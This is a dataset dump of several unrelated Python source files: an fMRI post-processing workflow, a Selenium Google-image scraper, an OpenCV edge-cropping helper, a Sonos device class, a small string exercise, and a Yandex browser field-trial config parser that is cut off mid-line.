+{"seq_id":"573109401","text":"n=int(input())\n\norg = input()\ns= []\nfor e in org:\n s.append(e)\n\nwhile(123-ord(max(s)) <=n):\n i= s.index(max(s))\n c = max(s)\n t = 123- ord(c)\n s[i] = chr( ord(c) - (26- t))\n n= n-t\n\nl = len(s)-1\ns[l] = chr(ord(s[l]) + n)\nprint(s)\n \n \n","sub_path":"lexicography.py","file_name":"lexicography.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"149231646","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\npost processing the bold\n^^^^^^^^^^^^^^^^^^^^^^^^\n.. 
autofunction:: init_boldpostprocess_wf\n\n\"\"\"\nimport sys\nimport os\nimport numpy as np\nimport nibabel as nb\nfrom nipype import __version__ as nipype_ver\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu\nfrom nipype import logging\nimport sklearn\nfrom ..interfaces import computeqcplot\nfrom niworkflows.engine.workflows import LiterateWorkflow as Workflow\nfrom ..utils import (bid_derivative, stringforparams,get_maskfiles,\n get_transformfilex,get_transformfile)\nfrom ..interfaces import FunctionalSummary\nfrom templateflow.api import get as get_template\nfrom niworkflows.interfaces.fixes import FixHeaderApplyTransforms as ApplyTransforms\nfrom nipype.interfaces.afni import Despike\nfrom ..interfaces import (ConfoundMatrix,FilteringData,regress)\nfrom ..interfaces import interpolate\nfrom .postprocessing import init_censoring_wf,init_resd_smoohthing\nfrom .execsummary import init_execsummary_wf\nfrom num2words import num2words\n#from postprocessing import stringforparams\n\nfrom ..workflow import (init_fcon_ts_wf,\n init_compute_alff_wf,\n init_3d_reho_wf)\nfrom .outputs import init_writederivatives_wf\nfrom xcp_abcd import workflow\n\nLOGGER = logging.getLogger('nipype.workflow')\n\n\n\ndef init_boldpostprocess_wf(\n lower_bpf,\n upper_bpf,\n contigvol,\n bpf_order,\n motion_filter_order,\n motion_filter_type,\n band_stop_min,\n band_stop_max,\n smoothing,\n bold_file,\n head_radius,\n params,\n custom_conf,\n omp_nthreads,\n dummytime,\n output_dir,\n fd_thresh,\n num_bold,\n mni_to_t1w,\n despike,\n brain_template='MNI152NLin2009cAsym',\n layout=None,\n name='bold_postprocess_wf',\n ):\n\n \"\"\"\n This workflow organizes bold processing workflow.\n Workflow Graph\n .. workflow::\n :graph2use: orig\n :simple_form: yes\n from xcp_abcd.workflow.bold import init_boldpostprocess_wf\n wf = init_boldpostprocess_wf(\n bold_file,\n lower_bpf,\n upper_bpf,\n contigvol,\n bpf_order,\n motion_filter_order,\n motion_filter_type,\n band_stop_min,\n band_stop_max,\n smoothing,\n head_radius,\n params,\n custom_conf,\n omp_nthreads,\n dummytime,\n output_dir,\n fd_thresh,\n num_bold,\n template='MNI152NLin2009cAsym',\n layout=None,\n name='bold_postprocess_wf',\n )\n Parameters\n ----------\n bold_file: str\n bold file for post processing\n lower_bpf : float\n Lower band pass filter\n upper_bpf : float\n Upper band pass filter\n layout : BIDSLayout object\n BIDS dataset layout\n contigvol: int\n number of contigious volumes\n despike: bool\n afni depsike\n motion_filter_order: int\n respiratory motion filter order\n motion_filter_type: str\n respiratory motion filter type: lp or notch\n band_stop_min: float\n respiratory minimum frequency in breathe per minutes(bpm)\n band_stop_max,: float\n respiratory maximum frequency in breathe per minutes(bpm)\n layout : BIDSLayout object\n BIDS dataset layout\n omp_nthreads : int\n Maximum number of threads an individual process may use\n output_dir : str\n Directory in which to save xcp_abcd output\n fd_thresh\n Criterion for flagging framewise displacement outliers\n head_radius : float\n radius of the head for FD computation\n params: str\n nuissance regressors to be selected from fmriprep regressors\n smoothing: float\n smooth the derivatives output with kernel size (fwhm)\n custom_conf: str\n path to cusrtom nuissance regressors\n dummytime: float\n the first vols in seconds to be removed before postprocessing\n\n Inputs\n ------\n bold_file\n BOLD series NIfTI file\n mni_to_t1w\n MNI to T1W ants Transformation 
file/h5\n ref_file\n Bold reference file from fmriprep\n bold_mask\n bold_mask from fmriprep\n cutstom_conf\n custom regressors\n\n Outputs\n -------\n processed_bold\n clean bold after regression and filtering\n smoothed_bold\n smoothed clean bold\n alff_out\n alff niifti\n smoothed_alff\n smoothed alff\n reho_out\n reho output computed by afni.3dreho\n sc217_ts\n schaefer 200 timeseries\n sc217_fc\n schaefer 200 func matrices\n sc417_ts\n schaefer 400 timeseries\n sc417_fc\n schaefer 400 func matrices\n gs360_ts\n glasser 360 timeseries\n gs360_fc\n glasser 360 func matrices\n gd333_ts\n gordon 333 timeseries\n gd333_fc\n gordon 333 func matrices\n qc_file\n quality control files\n \"\"\"\n\n\n TR = layout.get_tr(bold_file)\n file_base = os.path.basename(str(bold_file))\n workflow = Workflow(name=name)\n\n workflow.__desc__ = \"\"\"\nFor each of the {num_bold} BOLD series found per subject (across all\ntasks and sessions), the following post-processing was performed:\n\"\"\".format(num_bold=num2words(num_bold))\n\n if dummytime > 0:\n nvolx = str(np.floor(dummytime / TR))\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\nbefore nuisance regression and filtering of the data, the first {nvol} were discarded,\n.Furthermore,volumes with framewise-displacement greater than \n{fd_thresh} mm [@power_fd_dvars;@satterthwaite_2013] were flagged as outliers\n and excluded from nuisance regression.\n\"\"\".format(nvol=num2words(nvolx),fd_thresh=fd_thresh)\n\n else:\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\nbefore nuisance regression and filtering of the data, volumes with framewise-displacement greater than \n{fd_thresh} mm [@power_fd_dvars;@satterthwaite_2013] were flagged as outliers\n and excluded from nuisance regression.\n\"\"\".format(fd_thresh=fd_thresh)\n\n workflow.__desc__ = workflow.__desc__ + \"\"\" \\\n{regressors} [@benchmarkp;@satterthwaite_2013]. These nuisance regressors were \nregressed from the BOLD data using linear regression - as implemented in Scikit-Learn {sclver} [@scikit-learn].\nResidual timeseries from this regression were then band-pass filtered to retain signals within the {highpass}-{lowpass} Hz frequency band. 
\n \"\"\".format(regressors=stringforparams(params=params),sclver=sklearn.__version__,\n lowpass=upper_bpf,highpass=lower_bpf)\n\n\n # get reference and mask\n mask_file,ref_file = _get_ref_mask(fname=bold_file)\n\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['bold_file','ref_file','bold_mask','cutstom_conf','mni_to_t1w','t1w','t1seg']),\n name='inputnode')\n\n inputnode.inputs.bold_file = str(bold_file)\n inputnode.inputs.ref_file = str(ref_file)\n inputnode.inputs.bold_mask = str(mask_file)\n inputnode.inputs.custom_conf = str(custom_conf)\n\n\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['processed_bold', 'smoothed_bold','alff_out','smoothed_alff',\n 'reho_out','sc217_ts', 'sc217_fc','sc417_ts','sc417_fc','ts50_ts','ts50_fc',\n 'gs360_ts', 'gs360_fc','gd333_ts', 'gd333_fc','qc_file','fd']),\n name='outputnode')\n\n mem_gbx = _create_mem_gb(bold_file)\n\n\n fcon_ts_wf = init_fcon_ts_wf(mem_gb=mem_gbx['timeseries'],mni_to_t1w=mni_to_t1w,\n t1w_to_native=_t12native(bold_file),bold_file=bold_file,\n brain_template=brain_template,name=\"fcons_ts_wf\")\n\n alff_compute_wf = init_compute_alff_wf(mem_gb=mem_gbx['timeseries'], TR=TR,\n lowpass=upper_bpf,highpass=lower_bpf,smoothing=smoothing, cifti=False,\n name=\"compute_alff_wf\" )\n\n reho_compute_wf = init_3d_reho_wf(mem_gb=mem_gbx['timeseries'],smoothing=smoothing,\n name=\"afni_reho_wf\")\n\n write_derivative_wf = init_writederivatives_wf(smoothing=smoothing,bold_file=bold_file,\n params=params,cifti=None,output_dir=output_dir,dummytime=dummytime,\n lowpass=upper_bpf,highpass=lower_bpf,TR=TR,omp_nthreads=omp_nthreads,\n name=\"write_derivative_wf\")\n\n confoundmat_wf = pe.Node(ConfoundMatrix(head_radius=head_radius, params=params,\n filtertype=motion_filter_type,cutoff=band_stop_max,\n low_freq=band_stop_max,high_freq=band_stop_min,TR=TR,\n filterorder=motion_filter_order),\n name=\"ConfoundMatrix_wf\", mem_gb=mem_gbx['resampled'])\n\n censorscrub_wf = init_censoring_wf(mem_gb=mem_gbx['timeseries'],TR=TR,custom_conf=custom_conf,head_radius=head_radius,\n contigvol=contigvol,dummytime=dummytime,fd_thresh=fd_thresh,name='censoring')\n \n resdsmoothing_wf = init_resd_smoohthing(mem_gb=mem_gbx['timeseries'],smoothing=smoothing,cifti=False,\n name=\"resd_smoothing_wf\")\n \n filtering_wf = pe.Node(FilteringData(tr=TR,lowpass=upper_bpf,highpass=lower_bpf,\n filter_order=bpf_order),\n name=\"filtering_wf\", mem_gb=mem_gbx['timeseries'])\n\n regression_wf = pe.Node(regress(tr=TR),\n name=\"regression_wf\",mem_gb = mem_gbx['timeseries'])\n\n interpolate_wf = pe.Node(interpolate(TR=TR),\n name=\"interpolation_wf\",mem_gb = mem_gbx['timeseries'])\n\n \n executivesummary_wf =init_execsummary_wf(tr=TR,bold_file=bold_file,layout=layout,\n output_dir=output_dir,mni_to_t1w=mni_to_t1w,omp_nthreads=2)\n \n\n # get transform file for resampling and fcon\n \n \n \n transformfile = get_transformfile(bold_file=bold_file,\n mni_to_t1w=mni_to_t1w,t1w_to_native=_t12native(bold_file))\n t1w_mask = get_maskfiles(bold_file=bold_file,mni_to_t1w=mni_to_t1w)[1]\n\n bold2MNI_trans,bold2T1w_trans = get_transformfilex(bold_file=bold_file,\n mni_to_t1w=mni_to_t1w,t1w_to_native=_t12native(bold_file)) \n\n \n resample_parc = pe.Node(ApplyTransforms(\n dimension=3,\n input_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=1, desc='carpet',\n suffix='dseg', extension=['.nii', '.nii.gz'])),\n interpolation='MultiLabel',transforms=transformfile),\n name='resample_parc')\n \n resample_bold2T1w = pe.Node(ApplyTransforms(\n dimension=3,\n 
input_image=mask_file,reference_image=t1w_mask,\n interpolation='NearestNeighbor',transforms=bold2T1w_trans),\n name='bold2t1_trans')\n \n resample_bold2MNI = pe.Node(ApplyTransforms(\n dimension=3,\n input_image=mask_file,reference_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=2, desc='brain',\n suffix='mask', extension=['.nii', '.nii.gz'])),\n interpolation='NearestNeighbor',transforms=bold2MNI_trans),\n name='bold2mni_trans')\n\n qcreport = pe.Node(computeqcplot(TR=TR,bold_file=bold_file,dummytime=dummytime,t1w_mask=t1w_mask,\n template_mask = str(get_template('MNI152NLin2009cAsym', resolution=2, desc='brain',\n suffix='mask', extension=['.nii', '.nii.gz'])),\n head_radius=head_radius), name=\"qc_report\",mem_gb = mem_gbx['resampled'])\n \n\n workflow.connect([\n # connect bold confound matrix to extract confound matrix \n (inputnode, confoundmat_wf, [('bold_file', 'in_file'),]),\n ])\n \n # if there is despiking\n if despike:\n despike_wf = pe.Node(Despike(outputtype='NIFTI_GZ',args='-NEW'),name=\"despike_wf\",mem_gb=mem_gbx['resampled'])\n\n workflow.connect([\n (inputnode,despike_wf,[('bold_file','in_file')]),\n (despike_wf,censorscrub_wf,[('out_file','inputnode.bold')])\n ])\n else:\n workflow.connect([\n (inputnode,censorscrub_wf,[('bold_file','inputnode.bold')]),\n ])\n \n # add neccessary input for censoring if there is one\n workflow.connect([\n\t (inputnode,censorscrub_wf,[('bold_file','inputnode.bold_file'),\n\t ('bold_mask','inputnode.bold_mask')]),\n\t (confoundmat_wf,censorscrub_wf,[('confound_file','inputnode.confound_file')])\n ])\n\n # regression workflow \n workflow.connect([\n\t (inputnode,regression_wf,[('bold_mask','mask')]),\n\t (censorscrub_wf,regression_wf,[('outputnode.bold_censored','in_file'),\n\t ('outputnode.fmriprepconf_censored','confounds'), \n\t\t ('outputnode.customconf_censored','custom_conf')])\n ])\n # interpolation workflow\n workflow.connect([\n\t (inputnode,interpolate_wf,[('bold_file','bold_file'),('bold_mask','mask_file')]),\n\t (censorscrub_wf,interpolate_wf,[('outputnode.tmask','tmask')]),\n\t (regression_wf,interpolate_wf,[('res_file','in_file')]), \n\t])\n # add filtering workflow \n workflow.connect([\n (inputnode,filtering_wf,[('bold_mask','mask')]),\n\t (interpolate_wf,filtering_wf,[('bold_interpolated','in_file')]),\n\n ])\n \n # residual smoothing \n workflow.connect([\n\t (filtering_wf,resdsmoothing_wf,[('filt_file','inputnode.bold_file')]) \n ])\n\n #functional connect workflow\n workflow.connect([\n (inputnode,fcon_ts_wf,[('ref_file','inputnode.ref_file'),]),\n (filtering_wf,fcon_ts_wf,[('filt_file','inputnode.clean_bold'),]),\n ])\n # reho and alff\n workflow.connect([ \n\t (inputnode,alff_compute_wf,[('bold_mask','inputnode.bold_mask')]),\n\t (inputnode,reho_compute_wf,[('bold_mask','inputnode.bold_mask')]),\n\t (filtering_wf, alff_compute_wf,[('filt_file','inputnode.clean_bold')]),\n\t (filtering_wf, reho_compute_wf,[('filt_file','inputnode.clean_bold')]),\n ])\n\n # qc report\n workflow.connect([\n (inputnode,qcreport,[('bold_mask','mask_file')]),\n (filtering_wf,qcreport,[('filt_file','cleaned_file')]),\n (censorscrub_wf,qcreport,[('outputnode.tmask','tmask')]),\n (inputnode,resample_parc,[('ref_file','reference_image')]),\n (resample_parc,qcreport,[('output_image','seg_file')]),\n (resample_bold2T1w,qcreport,[('output_image','bold2T1w_mask')]),\n (resample_bold2MNI,qcreport,[('output_image','bold2temp_mask')]),\n (qcreport,outputnode,[('qc_file','qc_file')]),\n ])\n\n \n\n # write to the outputnode, may be use in 
future\n workflow.connect([\n\t(filtering_wf,outputnode,[('filt_file','processed_bold')]),\n\t(censorscrub_wf,outputnode,[('outputnode.fd','fd')]),\n\t(resdsmoothing_wf,outputnode,[('outputnode.smoothed_bold','smoothed_bold')]),\n\t(alff_compute_wf,outputnode,[('outputnode.alff_out','alff_out'),\n ('outputnode.smoothed_alff','smoothed_alff')]),\n (reho_compute_wf,outputnode,[('outputnode.reho_out','reho_out')]),\n\t (fcon_ts_wf,outputnode,[('outputnode.sc217_ts','sc217_ts' ),('outputnode.sc217_fc','sc217_fc'),\n ('outputnode.sc417_ts','sc417_ts'),('outputnode.sc417_fc','sc417_fc'),\n ('outputnode.gs360_ts','gs360_ts'),('outputnode.gs360_fc','gs360_fc'),\n ('outputnode.gd333_ts','gd333_ts'),('outputnode.gd333_fc','gd333_fc'),\n ('outputnode.ts50_ts','ts50_ts'),('outputnode.ts50_fc','ts50_fc')]),\n\n ])\n \n # write derivatives \n workflow.connect([\n (filtering_wf,write_derivative_wf,[('filt_file','inputnode.processed_bold')]),\n\t (resdsmoothing_wf,write_derivative_wf,[('outputnode.smoothed_bold','inputnode.smoothed_bold')]),\n (censorscrub_wf,write_derivative_wf,[('outputnode.fd','inputnode.fd')]),\n (alff_compute_wf,write_derivative_wf,[('outputnode.alff_out','inputnode.alff_out'),\n ('outputnode.smoothed_alff','inputnode.smoothed_alff')]),\n (reho_compute_wf,write_derivative_wf,[('outputnode.reho_out','inputnode.reho_out')]),\n (fcon_ts_wf,write_derivative_wf,[('outputnode.sc217_ts','inputnode.sc217_ts' ),\n ('outputnode.sc217_fc','inputnode.sc217_fc'),\n ('outputnode.sc417_ts','inputnode.sc417_ts'),\n ('outputnode.sc417_fc','inputnode.sc417_fc'),\n ('outputnode.gs360_ts','inputnode.gs360_ts'),\n ('outputnode.gs360_fc','inputnode.gs360_fc'),\n ('outputnode.gd333_ts','inputnode.gd333_ts'),\n ('outputnode.gd333_fc','inputnode.gd333_fc'),\n ('outputnode.ts50_ts','inputnode.ts50_ts'),\n ('outputnode.ts50_fc','inputnode.ts50_fc')]),\n (qcreport,write_derivative_wf,[('qc_file','inputnode.qc_file')]),\n\n\n\n ])\n functional_qc = pe.Node(FunctionalSummary(bold_file=bold_file,tr=TR),\n name='qcsummary', run_without_submitting=True)\n\n ds_report_qualitycontrol = pe.Node(\n DerivativesDataSink(base_directory=output_dir, desc='qualitycontrol',source_file=bold_file, datatype=\"figures\"),\n name='ds_report_qualitycontrol', run_without_submitting=True)\n\n ds_report_preprocessing = pe.Node(\n DerivativesDataSink(base_directory=output_dir, desc='preprocessing',source_file=bold_file, datatype=\"figures\"),\n name='ds_report_preprocessing', run_without_submitting=True)\n ds_report_postprocessing = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='postprocessing', datatype=\"figures\"),\n name='ds_report_postprocessing', run_without_submitting=True)\n\n ds_report_connectivity = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='connectvityplot', datatype=\"figures\"),\n name='ds_report_connectivity', run_without_submitting=True)\n\n ds_report_rehoplot = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='rehoplot', datatype=\"figures\"),\n name='ds_report_rehoplot', run_without_submitting=True)\n\n ds_report_afniplot = pe.Node(\n DerivativesDataSink(base_directory=output_dir,source_file=bold_file, desc='afniplot', datatype=\"figures\"),\n name='ds_report_afniplot', run_without_submitting=True)\n\n workflow.connect([\n (qcreport,ds_report_preprocessing,[('raw_qcplot','in_file')]),\n (qcreport,ds_report_postprocessing ,[('clean_qcplot','in_file')]),\n 
(qcreport,functional_qc,[('qc_file','qc_file')]),\n (functional_qc,ds_report_qualitycontrol,[('out_report','in_file')]),\n (fcon_ts_wf,ds_report_connectivity,[('outputnode.connectplot','in_file')]),\n (reho_compute_wf,ds_report_rehoplot,[('outputnode.rehohtml','in_file')]),\n (alff_compute_wf,ds_report_afniplot ,[('outputnode.alffhtml','in_file')]),\n ])\n\n\n ## exexetive summary workflow\n workflow.connect([\n (inputnode,executivesummary_wf,[('t1w','inputnode.t1w'),('t1seg','inputnode.t1seg'),\n ('bold_file','inputnode.bold_file'),('bold_mask','inputnode.mask')]),\n\n (regression_wf,executivesummary_wf,[('res_file','inputnode.regdata'),]),\n (filtering_wf,executivesummary_wf,[('filt_file','inputnode.resddata')]),\n (censorscrub_wf,executivesummary_wf,[('outputnode.fd','inputnode.fd')]),\n ]),\n\n return workflow\n\n\n\n\n\ndef _create_mem_gb(bold_fname):\n bold_size_gb = os.path.getsize(bold_fname) / (1024**3)\n bold_tlen = nb.load(bold_fname).shape[-1]\n mem_gbz = {\n 'derivative': bold_size_gb,\n 'resampled': bold_size_gb * 4,\n 'timeseries': bold_size_gb * (max(bold_tlen/100, 1.0) + 4),\n }\n\n return mem_gbz\n\ndef _get_ref_mask(fname):\n directx = os.path.dirname(fname)\n filename = filename=os.path.basename(fname)\n filex = filename.split('preproc_bold.nii.gz')[0] + 'brain_mask.nii.gz'\n filez = filename.split('_desc-preproc_bold.nii.gz')[0] +'_boldref.nii.gz'\n mask = directx + '/' + filex\n ref = directx + '/' + filez\n return mask, ref\n\ndef _t12native(fname):\n directx = os.path.dirname(fname)\n filename = os.path.basename(fname)\n fileup = filename.split('desc-preproc_bold.nii.gz')[0].split('space-')[0]\n\n t12ref = directx + '/' + fileup + 'from-T1w_to-scanner_mode-image_xfm.txt'\n\n return t12ref\n\n\nclass DerivativesDataSink(bid_derivative):\n out_path_base = 'xcp_abcd'\n ","sub_path":"xcp_abcd/workflow/bold.py","file_name":"bold.py","file_ext":"py","file_size_in_byte":20669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419221481","text":"from abc import ABC, abstractmethod\nimport logger\nimport cfg_sonos\n\n\nclass Device(ABC):\n @abstractmethod\n def is_alive(self):\n raise NotImplementedError\n\n def __init__(self, service_name):\n self.service_name = service_name\n self.logger = logger.Logger(service_name).logger\n self.cfg = cfg_sonos.Cfg()\n","sub_path":"SonosClient/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"405716335","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport urllib.request\nfrom bs4 import BeautifulSoup as bs\nimport re\nimport os\n\n\ngoogle_url_part1 = 'https://www.google.com/search?q='\ngoogle_url_part2 = '&source=lnms&tbm=isch'\nsearch_query = '停车' \nlocation_driver = 'C:/Users/HR/AppData/Local/Google/Chrome/Application/chromedriver.exe'\nurl = google_url_part1 + search_query + google_url_part2\nchrome_options = Options()\nchrome_options.add_argument(\"--disable-infobars\")\ndriver = webdriver.Chrome(executable_path=location_driver, chrome_options=chrome_options)\ndriver.maximize_window()\ndriver.get(url)\nimg_url_dic = {}\ncount = 0\ntarget_num = 3\npos = 0\nfor i in range(1): \n pos = i * 500 \n js = \"document.documentElement.scrollTop=%d\" % pos\n driver.execute_script(js)\n time.sleep(1)\n html_page = driver.page_source\n soup = bs(html_page, \"html.parser\")\n img_list = 
soup.findAll('img', {'class': 'rg_ic rg_i'})\n for img_url in img_list:\n try:\n print(count, end=' ')\n if img_url['src'] not in img_url_dic:\n target = '{}.jpg'.format(count)\n img_url_dic[img_url['src']] = ''\n urllib.request.urlretrieve(img_url['src'], target)\n count = count + 1\n if count == target_num:\n break\n except KeyError:\n continue\n if count == target_num:\n driver.close()\n\n","sub_path":"google_img.py","file_name":"google_img.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263620277","text":"import cv2\nfrom param import CHARWIDTH,CHARHEIGHT\n\ndef cropedge(img):\n rows1=topdown(img)\n rows2=downtop(img)\n cols1=leftright(img)\n cols2=rightleft(img)\n if rows2==0 or cols2==0:\n print('zero!')\n return img[5:44,0:40]\n return img[rows1:rows2,cols1:cols2]\n\n\ndef ifemptyrow(img,row,cols):\n col=0\n while col < cols:\n if img[row,col] != 0:\n return False\n col=col+1\n return True\n\n\ndef ifemptycol(img,col,rows):\n row=0\n while row < rows:\n if img[row,col] != 0:\n return False\n row=row+1\n return True\n\n\ndef topdown(img):\n rows,cols=img.shape\n row=0\n temp=img\n while ifemptyrow(temp,0,cols):\n row=row+1\n temp=img[row:rows,0:cols]\n if temp.shape[0]==0:\n return row\n return row\n\n\ndef downtop(img):\n rows,cols=img.shape\n row=rows\n temp=img\n while ifemptyrow(temp,temp.shape[0]-1,cols):\n row=row-1\n temp=img[0:row,0:cols]\n if temp.shape[0]==0:\n return row\n return row\n\n\ndef leftright(img):\n rows,cols=img.shape\n col=0\n temp=img\n while ifemptycol(temp,0,rows):\n col=col+1\n temp=img[0:rows,col:cols]\n if temp.shape[1]==0:\n return col\n return col\n\n\ndef rightleft(img):\n rows,cols=img.shape\n col=cols\n temp=img\n while ifemptycol(temp,temp.shape[1]-1,rows):\n col=col-1\n temp=img[0:rows,0:col]\n if temp.shape[1]==0:\n return col\n return col\n","sub_path":"cropedge.py","file_name":"cropedge.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280040378","text":"#!/usr/bin/env python\n# Copyright (c) 2015 Yandex LLC. 
All rights reserved.\n# Author: Kirill Kosarev \n\nimport argparse\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom distutils.version import LooseVersion\nimport json\nimport logging\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport urllib\nimport urllib2\nimport xml.etree.ElementTree as ET\n\nPROTO_FILE_URL = ('https://storage.ape.yandex.net/get/browser/'\n 'experiments/browser.proto')\nREPO_URL = ('https://bitbucket.browser.yandex-team.ru/projects'\n '/STARDUST/repos/browser-uploads/browse/')\nVARIATIONS_SEED = REPO_URL + 'Experiments/variations_seed_pb2.py?raw'\nSTUDY_PB2 = REPO_URL + 'Experiments/study_pb2.py?raw'\nFIELD_TRIALS_XML = os.path.join(os.path.dirname(__file__), '..', 'metrics',\n 'histograms', 'field_trials.xml')\nALL_SUPPORTED_PLATFORMS = ['linux', 'mac', 'win']\n\n# Initialized after loading STUDY_P2 module.\nPLATFORM_TYPES = None\nCHANNEL_BETA = None\nCHANNEL_STABLE = None\n\n#Experiment = namedtuple('Experiment',\n #['name', 'values', 'is_switch', 'is_obsolete', 'owner'])\nXMLDesc = namedtuple('XMLDesc', ['name', 'owner', 'description', 'obsolete'])\nCSVDesc = namedtuple('XMLDesc', ['name', 'owner', 'description', 'weight', 'value_str', 'obsolete'])\n\ndef _parse_variations(path, base_dir):\n if path:\n with open(path) as f:\n proto_data = f.read()\n else:\n proto_data = urllib2.urlopen(PROTO_FILE_URL).read()\n urllib.urlretrieve(VARIATIONS_SEED,\n os.path.join(base_dir, 'variations_seed_pb2.py'))\n urllib.urlretrieve(STUDY_PB2, os.path.join(base_dir, 'study_pb2.py'))\n sys.path.append(base_dir)\n\n from variations_seed_pb2 import VariationsSeed\n variations_seed = VariationsSeed()\n variations_seed.ParseFromString(proto_data)\n\n from study_pb2 import Study\n global PLATFORM_TYPES\n global CHANNEL_BETA\n global CHANNEL_STABLE\n PLATFORM_TYPES = {\n Study.PLATFORM_MAC: 'mac',\n Study.PLATFORM_WINDOWS: 'win',\n Study.PLATFORM_LINUX: 'linux',\n }\n CHANNEL_BETA = Study.BETA\n CHANNEL_STABLE = Study.STABLE\n return variations_seed\n\n\ndef _get_platforms(filter_platforms):\n if not filter_platforms:\n return ALL_SUPPORTED_PLATFORMS\n platforms = [PLATFORM_TYPES.get(v) for v in filter_platforms]\n return [p for p in platforms if p is not None]\n\n\ndef _get_most_relevant_experiment(study):\n exp = max(study.experiment, key=lambda e: int(e.probability_weight))\n weights_sum = sum(e.probability_weight for e in study.experiment)\n weight = float(exp.probability_weight) / weights_sum\n res = {'name': exp.name}\n if exp.feature_association:\n enabled_features = exp.feature_association.enable_feature\n disabled_features = exp.feature_association.disable_feature\n if enabled_features:\n res['enable_features'] = list(enabled_features)\n if disabled_features:\n res['disabled_features'] = list(disabled_features)\n if exp.param:\n res['params'] = dict((v.name, v.value) for v in exp.param)\n return res, weight\n\n\ndef _should_skip(study, chrome_version, yandex_version):\n filters = study.filter\n if filters.channel and not CHANNEL_STABLE in filters.channel:\n return True\n\n if chrome_version:\n if (filters.min_version and\n chrome_version < LooseVersion(filters.min_version)):\n logging.info('%s filtered by min version', study.name)\n return True\n if (filters.max_version and\n chrome_version > LooseVersion(filters.max_version)):\n logging.info('%s filtered by max version', study.name)\n return True\n\n if yandex_version:\n if (filters.ya_min_version and\n yandex_version < LooseVersion(filters.ya_min_version)):\n logging.info('%s filtered by 
ya_min version', study.name)\n return True\n if (filters.ya_max_version and\n yandex_version > LooseVersion(filters.ya_max_version)):\n logging.info('%s filtered by ya_max version', study.name)\n return True\n\n if filters.brand_id:\n return True\n\n if filters.partner_id:\n return True\n return False\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--chromium-version', type=LooseVersion)\n parser.add_argument('--yandex-version', type=LooseVersion)\n parser.add_argument('--verbose', '-v', action='store_true')\n parser.add_argument('--xml-description-file', type=str)\n parser.add_argument('--obsoletes-file', type=str)\n parser.add_argument('-o', '--output-file', type=str)\n parser.add_argument('input_file', nargs='?')\n return parser.parse_args()\n\n\ndef _parse_production_config(args):\n field_trials = {}\n tempdir = tempfile.mkdtemp()\n try:\n variations= _parse_variations(args.input_file, tempdir)\n finally:\n shutil.rmtree(tempdir)\n\n for study in variations.study:\n if _should_skip(study, args.chromium_version, args.yandex_version):\n continue\n\n experiment_value, experiment_weight = _get_most_relevant_experiment(study)\n studies_experiments = field_trials.setdefault(study.name, [])\n new_value = {\n 'platforms': _get_platforms(study.filter.platform),\n 'experiment': experiment_value,\n 'experiment_weight': experiment_weight\n }\n if not new_value in studies_experiments:\n studies_experiments.append(new_value)\n return field_trials\n\n\ndef _load_xml(file_path):\n res = {}\n xml_tree = ET.parse(file_path)\n root = xml_tree.getroot()\n for e in root.findall('experiment'):\n values = (\n [group.get('name') for group in e.findall('./groups/group')])\n is_obsolete = True if e.find('./obsolete') is not None else False\n res[e.get('name')] = XMLDesc(e.get('name'),\n e.find('./owner').text,\n e.find('./description').text,\n is_obsolete)\n return res\n\n\ndef _load_obsoletes(file_path):\n with open(file_path) as f:\n res = set([l.strip() for l in f])\n return res\n\n\ndef main():\n args = parse_args()\n if args.verbose:\n logging.basicConfig(level=logging.INFO)\n\n fieldtrials = _parse_production_config(args)\n xml_desc = _load_xml(args.xml_description_file)\n obsolete_experiments = _load_obsoletes(args.obsoletes_file)\n\n csv_descriptions = []\n for study_name, values in fieldtrials.iteritems():\n xml_study = xml_desc.get(study_name)\n obsolete_str = 'Possibly removed' if study_name in obsolete_experiments else ' '\n if xml_study:\n description_str = xml_study.description.replace('\\n', ' ').replace(';', ' ').strip()\n description_str = ' '.join(description_str.split())\n owner = xml_study.owner\n if xml_study.obsolete:\n obsolete_str = 'Removed'\n else:\n description_str = ' '\n owner = ' '\n\n value_dict = {}\n for v in values:\n for p in v['platforms']:\n if not p in value_dict:\n value_dict[p] = (v['experiment']['name'], v['experiment_weight'])\n value_str = ''\n\n if len(value_dict) == len(ALL_SUPPORTED_PLATFORMS) and len(set(value_dict.values())) == 1:\n value_str = 'all={}'.format(value_dict['win'][0])\n csv_descriptions.append(CSVDesc(\n study_name, owner, description_str,\n value_dict['win'][1], value_str, obsolete_str))\n elif len(value_dict):\n for k in sorted(value_dict.keys()):\n value_str = '{}={}'.format(k, value_dict[k][0])\n csv_descriptions.append(CSVDesc(\n study_name, owner, description_str,\n value_dict[k][1], value_str, obsolete_str))\n else:\n raise Exception('Study without experiment {}'.format(study_name))\n\n csv_descriptions = [v 
